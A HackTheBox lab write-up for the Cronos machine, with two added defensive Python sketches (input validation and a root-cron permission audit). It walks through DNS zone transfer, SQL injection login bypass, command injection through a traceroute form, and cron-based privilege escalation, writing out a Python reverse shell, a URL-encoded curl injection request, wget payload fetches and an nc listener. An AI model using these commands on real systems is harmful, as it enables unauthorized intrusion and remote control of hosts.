HackTheBox report — Cronos (2023)

Cronos is a machine that is solved with a simple SQL injection and a DNS zone transfer that lists its subdomains. Privilege escalation is quite easy once we discover a PHP file owned by our low-privilege user.

nmap -T4 -p- 10.10.10.13

Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-01 11:57 EDT
Nmap scan report for 10.10.10.13
Host is up (0.054s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 113.93 seconds

Ports 22, 53 and 80 are open.

nmap -T4 -A -p22,53,80 10.10.10.13

Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-01 12:07 EDT
Nmap scan report for 10.10.10.13
Host is up (0.051s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   51.10 ms 10.10.14.1
2   51.18 ms 10.10.10.13
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.88 seconds

Whenever I see a web server, I run a Nikto scan and brute-force the directories.

nikto -h 10.10.10.13

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.13 > gobuster.txt

Unfortunately, we don't find much.

The web server shows us a standard Apache page. Maybe there is a problem with DNS?

Using nslookup we were able to find the nameserver for cronos.htb:

nslookup

server 10.10.10.13

nslookup 10.10.10.13

We also do a zone transfer to see if there are any other domains.

host -l cronos.htb 10.10.10.13


ns1.cronos.htb

cronos.htb

admin.cronos.htb

Let's add these to our /etc/hosts file:

echo "10.10.10.13 cronos.htb" >> /etc/hosts

echo "10.10.10.13 admin.cronos.htb" >> /etc/hosts

By visiting http://cronos.htb and http://admin.cronos.htb we can check what comes back.

From here we can rerun the directory brute force and the Nikto scan against both domains.

nikto -h cronos.htb

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://cronos.htb

nikto -h admin.cronos.htb

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://admin.cronos.htb

We immediately notice that we get different results:

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://cronos.htb/
[+] Threads      : 10
[+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 302,307,200,204,301
=====================================================
/css (Status: 301)
/js (Status: 301)
=====================================================
Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://admin.cronos.htb/
[+] Threads      : 10
[+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,200
=====================================================
Nothing
=====================================================
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.13
+ Target Hostname:    admin.cronos.htb
+ Target Port:        80
+ Start Time:         2020-06-01 13:21:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /, fields: 0x30a6 0x555402443a52b
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7499 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-06-01 13:29:36 (GMT-4) (509 seconds)
---------------------------------------------------------------------------
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.13
+ Target Hostname:    cronos.htb
+ Target Port:        80
+ Start Time:         2020-06-01 13:02:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie XSRF-TOKEN created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x18 0x54cae721c43bb
+ Allowed HTTP Methods: GET, HEAD
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7445 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-06-01 13:11:57 (GMT-4) (578 seconds)
---------------------------------------------------------------------------

Not much has come out of these scans, so we turn our focus to http://admin.cronos.htb.

We could try administrative credentials, but we already know that this site is vulnerable to SQL injection. We enter the injection string in the "Username" field to get administrative access.

By clicking Submit, we gain access.

From here we find Net Tool v0.1, which gives access to the "traceroute" and "ping" commands. Let's see if we can run additional commands through ping or traceroute.

We try traceroute against 8.8.8.8, Google's DNS server, and also try to ping it.

We have set up a listener using tcpdump on the tun0 interface.

Since our IP address on this interface is 10.10.14.5, we will ping this IP address.


As you can see, the number of ping requests is increasing.

Let's load Burp and build a reverse shell by intercepting requests and see what we get back each time.

As you can see, these requests are URL-encoded. We need to URL-encode our reverse shell before sending the request.

It looks like we have Python on the computer, so we'll use a Python reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

This connects back to our IP on port 443.

Set up a listener and replace the ping request with the above code in Burp. Make sure to URL-encode it using CTRL + U in Repeater.

We send a request and we are blessed with a shell!

I have copied the request into the curl command below.

curl -i -s -k -X $'POST' \
-H $'Host: admin.cronos.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://admin.cronos.htb/welcome.php' -H $'Cookie: PHPSESSID=mpi2m3tie7smsrcbgrfs91si75' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 279' \
-b $'PHPSESSID=mpi2m3tie7smsrcbgrfs91si75' \
--data-binary $'command=traceroute&host=8.8.8.8+%26+python+-c+\'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"10.10.14.5\",443))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\'' \
$'http://admin.cronos.htb/welcome.php'
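
The request above succeeds because the "host" field is interpreted by a shell. As an added example (not from the original writeup, and not the application's own code, which the page does not show), here is how such a form handler can be hardened: the command comes from an allow-list, the host is validated, and the result is an argv list meant to be executed without a shell. The function names and the sample form bodies are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Fixed argv prefixes: the client picks a key, never the program or its flags.
ALLOWED = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute"],
}
# Hostname label: letters, digits and inner hyphens only, so no shell
# metacharacters, no spaces and no leading "-" that could pass for an option.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# Constructed sample bodies in the shape of the request shown in the writeup.
BENIGN = "command=traceroute&host=8.8.8.8"
INJECTED = "command=traceroute&host=8.8.8.8+%26+python+-c+pass"


def valid_host(host):
    """Accept only an IP literal or a dotted hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in host.split("."))


def build_argv(form_body):
    """Turn a urlencoded form body into an argv list, or raise ValueError."""
    fields = parse_qs(form_body, keep_blank_values=True)
    command = fields.get("command", [""])[0]
    host = fields.get("host", [""])[0]
    if command not in ALLOWED:
        raise ValueError("command not allowed: %r" % command)
    if not valid_host(host):
        raise ValueError("invalid host: %r" % host)
    # "--" ends option parsing. The list is intended for
    # subprocess.run(argv, shell=False), so "&" is never a command separator.
    return ALLOWED[command] + ["--", host]


if __name__ == "__main__":
    print(build_argv(BENIGN))
    try:
        build_argv(INJECTED)
    except ValueError as exc:
        print("rejected:", exc)
```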

Let's upgrade the shell with the following commands:

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z

fg

Once you type "fg + ENTER" after CTRL + Z, the shell is upgraded to a fully interactive shell.

Let's use LinEnum.sh to see how we can escalate our privileges to root. To do this, we put LinEnum.sh in our local directory and host an HTTP server. On the victim machine, we download it into the current user's home directory.

python3 -m http.server 80

wget http://10.10.14.5/LinEnum.sh

chmod +x LinEnum.sh

From here we can run the script.

./LinEnum.sh

In the script output, we notice that a PHP file in the www directory is run by a cron job. As the www-data user, this interests us.

Let's see if we have read/write permissions on this file: /var/www/laravel/artisan

Surprise! We own it..
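
An added example (not part of the original writeup) of a defensive audit for this finding: it lists files executed by root cron jobs that an untrusted account owns or can replace. The crontab line is a constructed sample built around the path above, and the function names are hypothetical.

```python
import os
import shlex
import stat

# Constructed sample in /etc/crontab format (m h dom mon dow user command).
# The path is the one from this writeup; schedule and arguments are assumed.
SAMPLE = "* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1\n"


def root_job_paths(crontab_text):
    """Return absolute paths named in the commands of jobs that run as root."""
    paths = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 6)
        # Skip blanks, comments, VAR=value lines and jobs of other users.
        if len(fields) < 7 or fields[0].startswith("#") or fields[5] != "root":
            continue
        try:
            tokens = shlex.split(fields[6])
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = fields[6].split()
        paths += [t for t in tokens if t.startswith("/")]
    return paths


def risky_reasons(path, trusted_uids=(0,)):
    """Why an account outside trusted_uids could change what this path runs."""
    try:
        st = os.stat(path)
        parent = os.stat(os.path.dirname(path) or "/")
    except OSError:
        return []  # missing path: nothing to audit
    if not stat.S_ISREG(st.st_mode):
        return []  # devices such as /dev/null are not scripts
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append("file owned by uid %d" % st.st_uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("file is group- or world-writable")
    sticky = parent.st_mode & stat.S_ISVTX
    if parent.st_uid not in trusted_uids or (parent.st_mode & stat.S_IWOTH and not sticky):
        reasons.append("parent directory lets others replace the file")
    return reasons


def audit(crontab_text, trusted_uids=(0,)):
    """Map each risky path used by a root cron job to the reasons it is risky."""
    findings = {}
    for path in root_job_paths(crontab_text):
        reasons = risky_reasons(path, trusted_uids)
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    # On a host configured as in the writeup this reports the artisan file.
    print(audit(SAMPLE))
```

Entries using shortcuts such as @reboot and per-user crontabs (which have no user column) are outside what this sketch parses.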


Let's turn the contents of this file into a reverse shell, set up a listener... and have root run a cron job, which (hopefully) gives us a reverse shell with root-level access.

We copied the reverse shell from /usr/share/webshells/php/php-reverse-shell.php to our local directory, renamed the file to rev.php and changed the parameters in it to our own IP/PORT which we use for the shell.

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php rev.php

Let's put the file on a local HTTP server and download it to our victim's /tmp directory. From here we will rename it to the name of the PHP page we are going to replace. Make sure to set the listener to the desired port.

python3 -m http.server 80

cd /tmp

wget http://10.10.14.5/rev.php

mv rev.php artisan

nc -nlvp 444

The last step is to move the file to the destination folder and wait for the cron job to run. According to the cron job, we found out that it is /var/www/laravel/.

cp artisan /var/www/laravel/


Root.txt is located at /root/root.txt

Article information

Author: Patricia Veum II

Last Updated: 06/20/2023
